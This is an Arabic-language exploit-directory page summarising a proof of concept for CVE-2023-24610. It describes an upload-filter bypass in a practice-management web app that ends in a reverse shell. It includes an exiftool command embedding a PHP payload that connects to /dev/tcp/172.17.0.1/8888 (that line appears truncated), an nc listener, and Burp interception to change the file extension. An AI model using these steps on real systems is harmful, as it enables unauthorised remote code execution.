Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-24610 — هذا إثبات مفهوم لـ CVE-2023-24610 | Kitploit
أدوات/GitHubGitHub/abbisqq/cve-2023-24610
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubabbisqq/cve-2023-24610

CVE-2023-24610

هذا إثبات مفهوم لـ CVE-2023-24610

عرض المستودع
3منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-24610

هذا هو دليل المفهوم لـ CVE-2023-24610

نبدأ بإنشاء ملف متعدد اللغات باستخدام exiftool: exiftool -Comment="/dev/tcp/172.17.0.1/8888 <&1\''); ?>" avatar.png -o polyglot.php

nosh1

نقوم بتغيير الملف إلى png ليتجاوز الفحص في الواجهة الأمامية

nosh2

بعد ذلك، نقوم بتشغيل مستمع nc على المنفذ 8888 لاستقبال الصدفة.

nosh3

الخطوة التالية هي تسجيل الدخول إلى التطبيق والنقر على الإعدادات

nosh4

في أسفل الصفحة، نرى منطقة شعار الممارسة. يمكننا رفع ملف باستخدام زر التحرير على الجانب الأيمن

nosh5

نضغط على تحرير ثم نضغط على تصفح، نحدد الملف “.png” الذي أنشأناه في الخطوة الأولى

nosh6

قبل النقر على رفع، نتأكد من اعتراض الطلب باستخدام burp أو ما شابه ذلك.

نضغط على رفع وفي burp نغير امتداد الملف من “png” إلى “php”

nosh7

نقوم بإيقاف الاعتراض ليتم رفع ملفنا والتحقق من مستمع nc الذي بدأناه سابقًا.

لدينا صدفة عكسية ويشير عنوان IP إلى حاوية docker الخاصة بنا.

nosh8

تنزيل الأداة